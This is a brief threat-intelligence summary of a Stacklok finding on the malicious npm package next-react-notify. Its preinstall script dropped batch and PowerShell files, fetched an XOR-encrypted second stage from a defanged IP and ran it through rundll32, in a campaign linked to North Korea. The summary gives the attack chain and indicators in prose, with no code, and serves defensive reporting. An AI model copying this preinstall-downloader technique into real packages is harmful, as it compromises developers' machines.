Stacklok reports that the npm package next-react-notify, published on 22 July 2024, copied the popular call-bind package and added a preinstall script that executed and deleted a downloader. On Windows systems, the script wrote execu.bat and yui.ps1, fetched an encrypted second stage from 166.88.61[.]72, XOR-decrypted it, renamed it to soss.dat, and ran it through rundll32. The hosting IP had resolved to cryptocopedia[.]com, infrastructure linked in earlier reporting on North Korean npm activity, and the package was unpublished less than four hours after publication. Stacklok assessed with reasonable confidence that the activity continued the same North Korean state-aligned open source supply chain campaign, while avoiding attribution to a specific group.